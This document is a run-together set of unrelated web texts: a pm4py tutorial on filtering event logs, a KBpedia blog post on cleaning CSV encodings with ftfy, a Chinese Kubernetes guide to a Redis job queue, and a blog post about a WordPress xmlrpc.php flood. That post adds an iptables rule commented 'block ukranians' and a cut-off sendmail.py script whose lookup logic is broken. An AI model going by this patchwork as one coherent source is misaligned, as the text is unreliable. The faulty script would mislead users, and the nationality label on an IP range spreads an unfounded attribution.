[{'variant': 'Confirmation of receipt,T02 Check confirmation of receipt,T04 Determine confirmation of receipt,T05 Print and send confirmation of receipt,T06 Determine necessity of stop advice,T10 Determine necessity to stop indication', 'count': 713}, {'variant': 'Confirmation of receipt,T06 Determine necessity of stop advice,T10 Determine necessity to stop indication,T02 Check confirmation of receipt,T04 Determine confirmation of receipt,T05 Print and send confirmation of receipt', 'count': 123}, {'variant': 'Confirmation of receipt', 'count': 116}, {'variant': 'Confirmation of receipt,T02 Check confirmation of receipt,T06 Determine necessity of stop advice,T10 Determine necessity to stop indication,T04 Determine confirmation of receipt,T05 Print and send confirmation of receipt', 'count': 115}, ...
Suppose you want to filter the log on the most common variant, then the following code could be used:
filtered_log1 = variants_filter.apply(log, ["Confirmation of receipt,T02 Check confirmation of receipt,T04 Determine confirmation of receipt,T05 Print and send confirmation of receipt,T06 Determine necessity of stop advice,T10 Determine necessity to stop indication"])
And the variants of the log could be checked:
variants_count_filtered_log1 = case_statistics.get_variant_statistics(filtered_log1) print(variants_count_filtered_log1)
Obtaining:
[{'variant': 'Confirmation of receipt,T02 Check confirmation of receipt,T04 Determine confirmation of receipt,T05 Print and send confirmation of receipt,T06 Determine necessity of stop advice,T10 Determine necessity to stop indication', 'count': 713}]
Suppose instead you want to filter out (remove) the most common variant. The following code could be used:
filtered_log2 = variants_filter.apply(log, ["Confirmation of receipt,T02 Check confirmation of receipt,T04 Determine confirmation of receipt,T05 Print and send confirmation of receipt,T06 Determine necessity of stop advice,T10 Determine necessity to stop indication"], parameters={"positive": False})
And the variants checked as above, obtaining:
[{'variant': 'Confirmation of receipt,T06 Determine necessity of stop advice,T10 Determine necessity to stop indication,T02 Check confirmation of receipt,T04 Determine confirmation of receipt,T05 Print and send confirmation of receipt', 'count': 123}, {'variant': 'Confirmation of receipt', 'count': 116}, ...
A filter to keep automatically the most common variants could be applied through the apply_auto_filter method. This method accepts a parameter called decreasingFactor (default value is 0.6; further details are provided in the start activities filter).
auto_filtered_log = variants_filter.apply_auto_filter(log)
Filtering on attributes values
Filtering on attributes values permits alternatively to:
Keep cases that contains at least an event with one of the given attribute values
Remove cases that contains an event with one of the the given attribute values
Keep events (trimming traces) that have one of the given attribute values
Remove events (trimming traces) that have one of the given attribute values
Example of attributes are the resource (generally contained in org:resource attribute) and the activity (generally contained in concept:name attribute).
To get the list of resources and activities contained in the log, the following code could be used:
from pm4py.algo.filtering.log.attributes import attributes_filter activities = attributes_filter.get_attribute_values(log, "concept:name") resources = attributes_filter.get_attribute_values(log, "org:resource")
Retrieving this list of resources (on the Receipt log):
{'Resource01': 1228, 'Resource02': 580, 'Resource03': 552, 'Resource04': 483, 'Resource05': 445, 'Resource06': 430, 'Resource07': 424, 'Resource08': 356, 'admin1': 352, 'Resource09': 350, 'Resource10': 329, 'Resource11': 328, 'Resource12': 326, 'Resource13': 307, 'Resource14': 264, 'Resource15': 235, 'Resource16': 215, 'Resource17': 194, 'Resource18': 170, 'admin2': 160, 'Resource19': 136, 'Resource20': 120, 'Resource21': 104, 'Resource22': 80, 'Resource23': 78, 'Resource24': 50, 'Resource25': 49, 'Resource26': 44, 'Resource27': 43, 'Resource28': 30, 'Resource29': 20, 'Resource30': 13, 'Resource31': 12, 'Resource32': 11, 'Resource33': 11, 'Resource34': 10, 'Resource35': 8, 'Resource36': 6, 'Resource37': 5, 'test': 5, 'admin3': 3, 'Resource38': 3, 'TEST': 2, 'Resource39': 2, 'Resource40': 1, 'Resource41': 1, 'Resource43': 1, 'Resource42': 1}
And this list of activities:
{'Confirmation of receipt': 1434, 'T06 Determine necessity of stop advice': 1416, 'T02 Check confirmation of receipt': 1368, 'T04 Determine confirmation of receipt': 1307, 'T05 Print and send confirmation of receipt': 1300, 'T10 Determine necessity to stop indication': 1283, 'T03 Adjust confirmation of receipt': 55, 'T07-1 Draft intern advice aspect 1': 45, 'T11 Create document X request unlicensed': 44, 'T12 Check document X request unlicensed': 41, 'T15 Print document X request unlicensed': 39, 'T14 Determine document X request unlicensed': 39, 'T07-2 Draft intern advice aspect 2': 32, 'T07-5 Draft intern advice aspect 5': 27, 'T17 Check report Y to stop indication': 26, 'T20 Print report Y to stop indication': 20, 'T19 Determine report Y to stop indication': 20, 'T16 Report reasons to hold request': 20, 'T08 Draft and send request for advice': 18, 'T07-3 Draft intern advice hold for aspect 3': 8, 'T09-3 Process or receive external advice from party 3': 8, 'T09-1 Process or receive external advice from party 1': 7, 'T07-4 Draft internal advice to hold for type 4': 6, 'T18 Adjust report Y to stop indicition': 6, 'T09-4 Process or receive external advice from party 4': 5, 'T13 Adjust document X request unlicensed': 2, 'T09-2 Process or receive external advice from party 2': 1}
To filter traces containing/not containing a given list of resources, the following code could be used:
from pm4py.util import constants tracefilter_log_pos = attributes_filter.apply(log, ["Resource10"], parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "org:resource", "positive": True}) tracefilter_log_neg = attributes_filter.apply(log, ["Resource10"], parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "org:resource", "positive": False})
To filter events (trimming traces) the following code could be used:
eventsfilter_log = attributes_filter.apply_events(log, ["Resource10"], parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "org:resource", "positive": True})
To apply automatically a filter on events attributes (trimming traces and keeping only events containing the attribute with a frequent value), the apply_auto_filter method is provided. The method accepts as parameters the attribute name and the decreasingFactor (default 0.6; an explanation could be found on the start activities filter). Example:
from pm4py.algo.filtering.log.attributes import attributes_filter from pm4py.util import constants filtered_log = attributes_filter.apply_auto_filter(log, parameters={ constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "concept:name", "decreasingFactor": 0.6})
Filter on numeric attribute values
Filtering on numeric attribute values provide options that are similar to filtering on string attribute values (that we already considered). We can see an example. We can import the roadtraffic100traces.xes log file.
import os from pm4py.objects.log.importer.xes import factory as xes_importer log = xes_importer.apply(os.path.join("tests", "input_data", "roadtraffic100traces.xes"))
The following filter (on events) help to keep only the events satisfying an amount comprised between 34 and 36.
from pm4py.algo.filtering.log.attributes import attributes_filter from pm4py.util import constants filtered_log_events = attributes_filter.apply_numeric_events(log, 34, 36, parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "amount"}) print(len(filtered_log_events))
Similarly, the following filter on cases helps to keep only cases with at least an event satisfying the specified amount:
filtered_log_cases = attributes_filter.apply_numeric(log, 34, 36, parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "amount"}) print(len(filtered_log_cases))
The filter on cases provide the option to specify up to two attributes that are checked on the events that shall satisfy the numeric range. For example, if we are interested in cases having an event with activity Add penalty that has an amount between 34 and 500, the following code helps:
filtered_log_cases = attributes_filter.apply_numeric(log, 34, 500, parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "amount", "stream_filter_key1": "concept:name", "stream_filter_value1": "Add penalty"})
Filtering on paths
Paths related to an attribute (e.g. the activity, the resource) describe the directly-follows relations according to the given attribute. To obtain a list of paths contained in the log, the following code could be used:
from pm4py.algo.filtering.log.paths import paths_filter from pm4py.util import constants paths_activities = paths_filter.get_paths_from_log(log, attribute_key="concept:name") paths_resources = paths_filter.get_paths_from_log(log, attribute_key="org:resource")
A filtered log containing only traces where at least one of the given paths occurred could be retrieved using the following code:
filtered_pos = paths_filter.apply(log, [("T06 Determine necessity of stop advice", "T02 Check confirmation of receipt")], parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "concept:name", "positive": True})
A filtered log containing only traces where none of the given paths has occurred could be retrieved using the following code:
filtered_neg = paths_filter.apply(log, [("T06 Determine necessity of stop advice", "T02 Check confirmation of receipt")], parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "concept:name", "positive": False})
.
|
Out of Sequence, But Reducing ‘Garbage’ Always Makes Sense
We have noted in previous installments in this Cooking with Python and KBpedia series how important consistent UTF-8 encoding is to roundtripping with our files. One of the ways we can enforce this importance is to consistently read and write files with UTF-8 specified, as discussed in CWPK #31. But, what if we have obtained external information? How can we ensure it is in the proper encoding or has wrong character assignments fixed? If we are going to perform such checks, what other consistency tests might we want to include? In this installment, we add some pre-build routines to test and clean our files for proper ingest.
As I noted in CWPK #39, cleaning comes before the build steps in the actual build process. But we wanted to have an understanding of broader information flows throughout the build or use scenarios before formulating the cleaning routines. That is both because they are not always operationally applied, and because working out the build steps was aided by not having to carry around extra routines. Now that we have the ingest and build steps fairly well outlined, it is an easier matter to see where and how cleaning steps best fit into this flow.
At the outset, we know we want to work with clean files when building KBpedia. Do we want such checks to run in every build, or optionally? Do we want to run checks against single files or against entire directories or projects? Further, are we not likely to want to add more checks over time as our experience with the build process and problems encountered increase? Lastly, we can see down the road (CWPK #48) to where we also only want to make incremental changes to an existing knowledge graph, as opposed to building one from scratch or de novo. How might that affect cleaning requirements or placement of methods?
Design Considerations
In thinking about these questions, we decided to take this general approach to testing and vetting clean files:
Once vetted, files will remain clean (insofar as the tests run) until next edited. It may not make sense to check all files automatically at the beginning of a build. This point suggests we should have a separate set of cleaning routines from the overall build process. We may later want to include that into an overall complete build routine, but we can do so later as part of a make file approach rather than including cleaning as a mandatory part of all builds.
Once we have assembled our files for a new build, we should assume that all files are unvetted. As build iterations proceed, we only need to vet those files that have been modified. When initially testing a new build, it probably makes sense for us to be able to loop over all of the input files in a given directory (corresponding to most of the subdirectories under
kbpedia > version > build; see priorCWPK #37installment). These points suggest we want the option to configure our clean routines for either all files in a subdirectory or a list of files. To keep configuration complexity lower, we will stipulate that if a list of files is used, they should all be in the same subdirectory.
Our biggest cleaning concern is that we have clean, UTF-8 text (encodings) in all of our input files. However, if we need to run this single test, we ought to test for other consistency concerns, as well. Here are the additional tests that look useful in our initial module development:
Have new fields (columns) been added to our CSV files?
Are our input files missing already defined fields?
Are we missing required fields (prefLabelanddefinition)?
Are our fields properly constructed (CamelCase with initial cap for classes, initial lowercase for properties, and URI encoding for IRIs)?
If we
have encoding issues, and given the manual effort required to fix them, can we include some form of encoding ‘fix’ routine? It turns out there is a Python package for such a routine, that we will test in this installment and include if deemed useful.do
These considerations are what have guided the design of the cowpoke clean module. Also, as we noted in CWPK #9, our design is limited to Python 3x. Python 2 has not been accommodated in cowpoke.
A Brief Detour for URIs
KBpedia is a knowledge graph based on semantic technologies and which incorporates seven major public and online knowledge bases: Wikipedia, Wikidata, DBpedia, schema.org, GeoNames, UNSPSC, and OpenCyc. A common aspect of all of these sources is that reference to information is a Web string that ‘identifies’ the item at hand that, when clicked, also takes us to the source of that item. In the early days of the Web this identifier mostly pertained to Web pages and was known as a Universal Resource Locator, or URL. They were the underlined blue links of the Web’s early days.
But, there are other protocols for discovering resources on the Internet beside the Web protocols of HTTP and HTTPS. There is Gopher, FTP, email, and others. Also, as information began to proliferate from Web pages to data items within databases and these other sources, the idea of a ‘locator’ was generalized to include ‘identifiers’ when it is a data item and not a page. This generalization is known as a URI, or if a ‘name’ within other schema or protocols, known as a URN. Here, for example, is the URI address of the English Wikipedia main page:
https://en.wikipedia.org/wiki/Main_Page
Note that white space is not allowed in this string, and is replaced with underscores in this example.
The allowed characters that could be used in constructing one of these addresses were limited to mostly ASCII characters, with some characters like the forward-slash (‘/’) forbidden because they are a defined constructor of an address. If one wanted to include non-allowed characters in a URI address, it needed to be percent encoded. Here, for example, is the English Wikipedia address for its article on the Côte d’Azur Observatory:
https://en.wikipedia.org/wiki/C%C3%B4te_d%27Azur_Observatory
This format is clearly hard to read. Most Web browsers, for example, decode these strings when you look at the address within the browser, so it appears as this:
https://en.wikipedia.org/wiki/Côte_d'Azur_Observatory
And, in fact, if you submit the string as exactly shown above, encoders at Wikipedia would accept this input string.
The Internationalized Resource Identifier (IRI was proposed and then adopted on the Web as a way of bringing in a wider range of acceptable characters useful to international languages. Mostly what we see in browsers today is the IRI version of these addresses, even if not initially formulated as such.
Sources like Wikipedia and Wikidata restrict their addresses to URIs. A source like DBpedia, on the other hand, supports IRIs. Wikipedia also has a discussion on how to fix these links.
The challenge in these different address formats is that if encoding gets screwed up, IRI versions of addresses can also get screwed up. That might be marginally acceptable when we are encoding something like a definition or comment (an annotation), but absolutely breaks the data record if it occurs to that record’s identifying address: Any change or alteration of the exact characters in the address means we can no longer access that data item.
Non-percent encoded Wikipedia addresses and DBpedia addresses are two problem areas. We also have tried to limit KBpedia’s identifiers to the ASCII version of these international characters. For example, the KBpedia item for Côte-d’Or shows as the address:
http://kbpedia.org/kko/rc/CoteDOr
We still have a readable label, but one with encoding traps removed.
I provide this detour to highlight that we also need to give special attention in our clean module to how Web addresses are coming in to the system and being treated. We obviously want to maintain the original addresses as supplied by the respective external sources. We also want to test and make sure these have not been improperly encoded. And we also want to test that our canonical subset of characters used in KBpedia is being uniformly applied to our own internal addresses.
Encoding Issues and ftfy
Despite it being design point #4 above, let’s first tackle the question of whether encoding fixes may be employed. I move it up the list because it is also the best way to illustrate why encoding issues are at the top of our concerns. First, let’s look at 20 selected records from KBpedia annotations that contain a diversity of language and symbol encodings.
These three files are part of the cowpoke distribution. This first file is the starting set of 20 selected records (remember Run or shift+enter to run the cell):
with open(r'C:\1-PythonProjects\kbpedia\v300\builds\working\annotations_orig.csv', 'r', encoding='utf8') as f:
print(f.read())
However, here is that same file when directly imported into Excel and then saved (notice we had to change the encoding to get the file to load in Python):
with open(r'C:\1-PythonProjects\kbpedia\v300\builds\working\annotations_excel.csv', 'r', encoding='cp1252') as f:
print(f.read())
Wow, did that file ever get screwed up! (You will obviously need to change the file locations to match your local configuration.) In fact, there are ways to open CSV files properly in Excel by first firing up the application and then using the File → Open dialogs, but the form above occurs in English MS Excel when you open the file directly, make a couple of changes, and then save. If you do not have a backup, you would be in a world of hurt.
So, how might we fix this file, or can we? The first thing to attempt is to load the file with the Python encoding set to UTF-8. Indeed, in many cases, that is sufficient to restore the proper character displays. One thing that is impressive in the migration to Python 3.6 and later is tremendously more forgiving behavior around UTF-8. That is apparently because of the uniform application now of UTF-8 across Python, plus encoding tests that occur earlier when opening files than occurred with prior versions of Python.
But in instances where this does not work, the next alternative is to use ftfy (fixes text for you). The first thing we need to do is to import the module, which is already part of our conda distribution (see CWPK #9):
import ftfy
Then, we can apply ftfy methods (of which there are many useful ones!) to see if we can resurrect that encoding-corrupted file from Excel:
import io
with io.open(r'C:\1-PythonProjects\kbpedia\v300\builds\working\annotations_excel.csv', encoding='utf-8', mode='r', errors='ignore',) as f:
lines = f.readlines()
print(lines)
fixed_lines = [ftfy.fix_text(line) for line in lines]
print(fixed_lines)
# so you may inspect the results, but we will also write it to file:
with io.open(r'C:\1-PythonProjects\kbpedia\v300\builds\working\annotations_fixed.csv', encoding='utf-8', mode='w',) as out:
print(fixed_lines, file=out)
I have to say this is pretty darn impressive! We have recovered nearly all of the original formats. Now, it is the case there are some stoppers in the file, which is why we needed to incorporate the more flexible io method of opening the file to be able to ignore the errors. Each of the glitches that occur in the file still need to be manually fixed. But, we can also use the ‘replace’ as a different argument to ‘error’ to insert some known characters to more quickly find these glitches. Overall, this is a much reduced level of effort to fix the file than without ftfy. We have moved from a potentially catastrophic situation to one that is an irritant to fix. That is progress!
Just to confirm (and for which one could do file compares to see specific differences to also help in the manual corrections), here is our now ‘fixed’ output file:
with open(r'C:\1-PythonProjects\kbpedia\v300\builds\working\annotations_fixed.csv', 'r', encoding='utf-8') as f:
print(f.read())
We can also inspect our files as to what encoding we think it has. Again, we use an added package, chardet in this case, to test any suspect file. Here is the general form:
import chardet
with open(r'C:\1-PythonProjects\kbpedia\v300\builds\working\annotations_fixed.csv', 'rb') as rawdata:
result = chardet.detect(rawdata.read(10000))
# check what the character encoding might be
print(result)
{'encoding': 'utf-8', 'confidence': 0.99, 'language': ''}
Note that one of the arguments is to pass the first 10,000 characters to the method as the basis for estimating the encoding type. Since the routine is quick, there is really no reason to lower this amount, and higher does not seem to provide any better statistics.
Again, a gratifying aspect of the improvements to Python since version 3.6 or so has been a more uniform approach to UTF-8. We also see we have some tools at our disposal, namely ftfy, that can help us dig out of holes that prior encoding mistakes may have dug. In our early years when encoding mismatches were more frequent, we also developed a Clojure routine for fixing bad characters (or at least converting them to a more readable form). It is likely this routine is no longer needed with Python’s improved handling of UTF-8. However, if this is a problem for your own input files, you can import the unicodedata module for the Python standard library to convert accented (diacritic) characters to ones based on ASCII. Here is the basic form of that procedure:
import unicodedata
def remove_diacrits(input_str):
input_str = unicodedata.normalize('NFD', input_str).encode('ascii', 'ignore')\
.decode('utf-8')
return str(input_str)
s = remove_diacrits("Protégé")
print(s)
Protege
You can embed that routine in a CSV read that also deals with entire rows at a time, similar to some of the other procedures noted here.
However, the best advice, as we have reiterated, is to make sure that files are written and opened in UTF-8. But, it is good to know if we encounter encoding issues in the wild, that both Python and some of its great packages stand ready to help rectify matters (or at least partially so, with less pain). We have also seen how encoding problems can often be a source of garbage input data.
Flat File Checks
Though Python routines could be written for the next points below, they may be easier to deal with directly in a spreadsheet. This is OK, since we are also at that point in our roundtripping where we are dealing directly with CSV files anyway.
To work directly with the sheet, highlight the file’s entire set of rows and columns that are intended for eventual ingest during a build. Give that block a logic name in the upper left text box entry directly above the sheet, such as ‘Match’ or ‘Big’. You can continue to invoke that block name to re-highlight your subject block. From there, are can readily sort for the specific input column of interest in order to inspect the entire row of values.
Here is my checklist for such flat file inspection:
Does any item in the ‘id’ column lack a URI fragment identifier? If so, provide using the class and property URI naming conventions in KBpedia (CamelCase in both instances, upper initial case for classes, lower initial case for properties, with only alphanumerics and underscore as allowable characters). Before adding a new ‘id’, make sure it is initially specified in one of the class or property
structinput files
Does any item in the ‘prefLabel’ column lack a preferred label? If so, add one; this field is mandatory
Does any item in the ‘definition’ column lack an entry? If so, add one. Though this field is not mandatory, it is highly encouraged
Check a few rows. Does any column entry have leading or trailing white spaces? If so, use the spreadsheet TRIM function
Check a few rows. Do any of the files with a ‘definition’ column show its full text spread over more than one cell? If so, you have an upstream CSV processing issue that is splitting entries at the common or some other character that should be escaped. The best fix, if intermediate processing has not occurred, is to re-extract the file with correct CSV settings. If not, you may need to concatenate multiple cells in a row in order to re-construct the full string
URI fragment identifier? If so, provide using the class and property URI naming conventions in KBpedia (CamelCase in both instances, upper initial case for classes, lower initial case for properties, with only alphanumerics and underscore as allowable characters). Before adding a new ‘id’, make sure it is initially specified in one of the class or property
structinput files
Check entries for wrong or misspecified namespaces or prefixes. Make sure fragments end with the appropriate characters (‘#’ or ‘/’ if used in a URI construction)
Check columns where multiple entries may reside using the double-pipe (‘||’) convention, and ensure these decomposable strings are being constructed properly.
One of the reasons I am resistant to a complete build routine cascading through all of these steps at once is that problems in intermediate processing files propagate through all subsequent steps. That not only screws up much stuff, but it is harder to trace where the problem first arose. This is an instance where I prefer a ‘semi-automatic’ approach, with editorial inspection required between essential build steps.
Other Cleaning Routines
Fortunately, in our case, we are extracting fairly simple CSV files (though often with some long text entries for definitions) and ingesting in basically the same format. As long as we are attentive to how we modify the intermediate flat files, there is not too much further room for error.
However, there are many sources of external data that may eventually warrant incorporation in some manner into your knowledge graph. These external sources may pose a larger set of cleaning and wrangling challenges. Date and time formats, for example, can be particularly challenging.
Hadley Wickham, the noted R programmer and developer of many fine graphics programs, wrote a paper, Tidy Data, that is an excellent starting primer on wrangling flat files. In the case of our KBpedia knowledge graph and its supporting CSV, about the only guideline that he proposes that we consciously violate is to combine many-to-one data items sometimes in a single column (notable for altLabels, but a few others as well). According to Wickham, we should put each individual value on its own row. I have not done so to keep the listings more compact and the row count manageable. Nonetheless, his general guidance is excellent. Another useful guide is Wrangling Messy CSV Files by Detecting Row and TypePatterns.
There are also many additional packages in Python that may assist in dealing with ‘dirty’ input files. Depending on the specific problems you may encounter, some quick Web searches should turn up some useful avenues to pursue.
Lastly, in both our utils.py and other modules going forward, we will have occasion to develop some bespoke cleaning and formatting routines as our particular topic warrants.
Additional Documentation
Here is some additional documentation related to todays CWPK installment:
|
Edit This Page
使用工作队列进行精细的并行处理
在这个例子中,我们会运行一个Kubernetes Job,其中的 Pod 会运行多个并行工作进程。
在这个例子中,当每个pod被创建时,它会从一个任务队列中获取一个工作单元,处理它,然后重复,直到到达队列的尾部。
下面是这个示例的步骤概述
启动存储服务用于保存工作队列。 在这个例子中,我们使用 Redis 来存储工作项。在上一个例子中,我们使用了 RabbitMQ。在这个例子中,由于 AMQP 不能为客户端提供一个良好的方法来检测一个有限长度的工作队列是否为空,我们使用了 Redis 和一个自定义的工作队列客户端库。在实践中,您可能会设置一个类似于 Redis 的存储库,并将其同时用于多项任务或其他事务的工作队列。<!–
Create a queue, and fill it with messages. Each message represents one task to be done. Inthis example, a message is just an integer that we will do a lengthy computation on.–>
创建一个队列,然后向其中填充消息。 每个消息表示一个将要被处理的工作任务。在这个例子中,消息只是一个我们将用于进行长度计算的整数。<!–
Start a Job that works on tasks from the queue. The Job starts several pods. Each pod takesone task from the message queue, processes it, and repeats until the end of the queue is reached.–>
启动一个 Job 对队列中的任务进行处理。这个 Job 启动了若干个 Pod 。每个 Pod 从消息队列中取出一个工作任务,处理它,然后重复,直到到达队列的尾部。
准备开始
You need to have a Kubernetes cluster, and the kubectl command-line tool mustbe configured to communicate with your cluster. If you do not already have acluster, you can create one by usingMinikube,or you can use one of these Kubernetes playgrounds:
To check the version, enter kubectl version.
启动 Redis
对于这个例子,为了简单起见,我们将启动一个单实例的 Redis。了解如何部署一个可伸缩、高可用的 Redis 例子,请查看 Redis 样例
如果您在使用本文档库的源代码目录,您可以进入如下目录,然后启动一个临时的 Pod 用于运行 Redis 和 一个临时的 service 以便我们能够找到这个 Pod
$ cd content/en/examples/application/job/redis
$ kubectl create -f ./redis-pod.yaml
pod/redis-master created
$ kubectl create -f ./redis-service.yaml
service/redis created
如果您没有使用本文档库的源代码目录,您可以直接下载如下文件:
使用任务填充队列
现在,让我们往队列里添加一些“任务”。在这个例子中,我们的任务只是一些将被打印出来的字符串。
启动一个临时的可交互的 pod 用于运行 Redis 命令行界面。
$ kubectl run -i --tty temp --image redis --command "/bin/sh"
Waiting for pod default/redis2-c7h78 to be running, status is Pending, pod ready: false
Hit enter for command prompt
现在按回车键,启动 redis 命令行界面,然后创建一个存在若干个工作项的列表。
# redis-cli -h redis
redis:6379> rpush job2 "apple"
(integer) 1
redis:6379> rpush job2 "banana"
(integer) 2
redis:6379> rpush job2 "cherry"
(integer) 3
redis:6379> rpush job2 "date"
(integer) 4
redis:6379> rpush job2 "fig"
(integer) 5
redis:6379> rpush job2 "grape"
(integer) 6
redis:6379> rpush job2 "lemon"
(integer) 7
redis:6379> rpush job2 "melon"
(integer) 8
redis:6379> rpush job2 "orange"
(integer) 9
redis:6379> lrange job2 0 -1
1) "apple"
2) "banana"
3) "cherry"
4) "date"
5) "fig"
6) "grape"
7) "lemon"
8) "melon"
9) "orange"
因此,这个键为 job2 的列表就是我们的工作队列。
注意:如果您还没有正确地配置 Kube DNS,您可能需要将上面的第一步改为 redis-cli -h $REDIS_SERVICE_HOST。
创建镜像
现在我们已经准备好创建一个我们要运行的镜像
我们会使用一个带有 redis 客户端的 python 工作程序从消息队列中读出消息。
这里提供了一个简单的 Redis 工作队列客户端库,叫 rediswq.py (下载)。
Job 中每个 Pod 内的 “工作程序” 使用工作队列客户端库获取工作。如下:
application/job/redis/worker.py
#!/usr/bin/env python
import time
import rediswq
host="redis"
# Uncomment next two lines if you do not have Kube-DNS working.
# import os
# host = os.getenv("REDIS_SERVICE_HOST")
q = rediswq.RedisWQ(name="job2", host="redis")
print("Worker with sessionID: " + q.sessionID())
print("Initial queue state: empty=" + str(q.empty()))
while not q.empty():
item = q.lease(lease_secs=10, block=True, timeout=2)
if item is not None:
itemstr = item.decode("utf=8")
print("Working on " + itemstr)
time.sleep(10) # Put your actual work here instead of sleep.
q.complete(item)
else:
print("Waiting for work")
print("Queue empty, exiting")
如果您在使用本文档库的源代码目录,请将当前目录切换到 content/en/examples/application/job/redis/。否则,请点击链接下载 worker.py、 rediswq.py 和 Dockerfile。然后构建镜像:
docker build -t job-wq-2 .
Push 镜像
对于 Docker Hub,请先用您的用户名给镜像打上标签,然后使用下面的命令 push 您的镜像到仓库。请将 <username> 替换为您自己的用户名。
docker tag job-wq-2 <username>/job-wq-2
docker push <username>/job-wq-2
您需要将镜像 push 到一个公共仓库或者 配置集群访问您的私有仓库。
如果您使用的是 Google ContainerRegistry,请先用您的 project ID 给您的镜像打上标签,然后 push 到 GCR 。请将 <project> 替换为您自己的 project ID
docker tag job-wq-2 gcr.io/<project>/job-wq-2
gcloud docker -- push gcr.io/<project>/job-wq-2
定义一个 Job
这是 job 定义:
application/job/redis/job.yaml
apiVersion: batch/v1
kind: Job
metadata:
name: job-wq-2
spec:
parallelism: 2
template:
metadata:
name: job-wq-2
spec:
containers:
- name: c
image: gcr.io/myproject/job-wq-2
restartPolicy: OnFailure
请确保将 job 模板中的 gcr.io/myproject 更改为您自己的路径。
在这个例子中,每个 pod 处理了队列中的多个项目,直到队列中没有项目时便退出。因为是由工作程序自行检测工作队列是否为空,并且 Job 控制器不知道工作队列的存在,所以依赖于工作程序在完成工作时发出信号。工作程序以成功退出的形式发出信号表示工作队列已经为空。所以,只要有任意一个工作程序成功退出,控制器就知道工作已经完成了,所有的 Pod 将很快会退出。因此,我们将 Job 的 completion count 设置为 1 。尽管如此,Job 控制器还是会等待其它 Pod 完成。
运行 Job
现在运行这个 Job :
kubectl create -f ./job.yaml
稍等片刻,然后检查这个 Job。
$ kubectl describe jobs/job-wq-2
Name: job-wq-2
Namespace: default
Selector: controller-uid=b1c7e4e3-92e1-11e7-b85e-fa163ee3c11f
Labels: controller-uid=b1c7e4e3-92e1-11e7-b85e-fa163ee3c11f
job-name=job-wq-2
Annotations: <none>
Parallelism: 2
Completions: <unset>
Start Time: Mon, 11 Jan 2016 17:07:59 -0800
Pods Statuses: 1 Running / 0 Succeeded / 0 Failed
Pod Template:
Labels: controller-uid=b1c7e4e3-92e1-11e7-b85e-fa163ee3c11f
job-name=job-wq-2
Containers:
c:
Image: gcr.io/exampleproject/job-wq-2
Port:
Environment: <none>
Mounts: <none>
Volumes: <none>
Events:
FirstSeen LastSeen Count From SubobjectPath Type Reason Message
--------- -------- ----- ---- ------------- -------- ------ -------
33s 33s 1 {job-controller } Normal SuccessfulCreate Created pod: job-wq-2-lglf8
$ kubectl logs pods/job-wq-2-7r7b2
Worker with sessionID: bbd72d0a-9e5c-4dd6-abf6-416cc267991f
Initial queue state: empty=False
Working on banana
Working on date
Working on lemon
您可以看到,其中的一个 pod 处理了若干个工作单元。
其它
如果您不方便运行一个队列服务或者修改您的容器用于运行一个工作队列,您可以考虑其它的 job 模式。
如果您有连续的后台处理业务,那么可以考虑使用 replicationController 来运行您的后台业务,和运行一个类似 https://github.com/resque/resque 的后台处理库。
反馈
此页是否对您有帮助?
是
否
Thanks for the feedback. If you have a specific, answerable question about how to use Kubernetes, ask it on Stack Overflow. Open an issue in the GitHub repo if you want to report a problem or suggest an improvement.
|
On this sunny day of February 28, 2016, the year of our Lord, I woke up with a bunch of emails telling me MySQL db on this fine server has been going down a whole number of times.
SSH didn't work, until it did. At which point I could not execute any command because OS could not fork anything due to the lack of free memory.
Once the top command managed to work I saw that everything was dominated by a big array of apache2 processes, which indicated some sort of DOS attack.
After a nice reboot (and a backup in between, of course!) I took a look at the logs and discovered a whole bunch of accesses like such:
185.93.185.249 - - [28/Feb/2016:21:40:49 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.247 - - [28/Feb/2016:21:41:10 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.249 - - [28/Feb/2016:21:41:35 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.247 - - [28/Feb/2016:21:42:22 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.253 - - [28/Feb/2016:21:42:30 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.253 - - [28/Feb/2016:21:42:36 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.253 - - [28/Feb/2016:21:42:52 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.254 - - [28/Feb/2016:21:42:55 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.254 - - [28/Feb/2016:21:44:01 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
As first order of business, I moved xmlrpc.php somewhere out of sight (who needs it anyway? I can post shit just fine!) then minimized the number of processes apache can spawn and added some golden rules to iptables:
# block ukranians
iptables -I INPUT -m iprange --src-range 185.93.185.1-185.93.185.254 -j DROP
And now you can read this!
Recently I have had the pleasure of migrating a WordPress website which resulted in a peculiar problem - sending email functionality on the new server no longer worked. After some digging around I found out that PHP has this mail function which uses the sendmail program to actually send your email.
Well after messing around with real sendmail for a good while and still not really understanding how to configure it properly, I decided to write my own sendmail.py script that uses my gmail and its app password to send out an email to whoever PHP/Wordpress wants to send an email to on my behalf.
After script was done I had to tell php to use it via sendmail_path = path to sendmail.py line inside php.ini which was located /etc/php5/apache2/php.ini on my Debian server. Then I just restarted apache server and voila, sending email worked!
Here is sendmail.py in all of its hacky glory:
#!/usr/bin/python
#this is replacement for sendmail that php can use to send its goddamn emails
import smtplib
import sys
def findToAddress(lines):
for i, val in enumerate(lines):
j = val.index("To: ")
if j != -1:
return val[j+4:]
return ""
fromaddr = 'whatever@example.com'
lines = sys.stdin.readlines()
toaddrs = findToAddress(lines)
msg = ''.join(lines)
username = 'you@gmail.com'
password = 'your app password'
# The actual mail send
server = smtplib.SMTP('smtp.gmail.com:25')
server.starttls()
server.login(username,password)
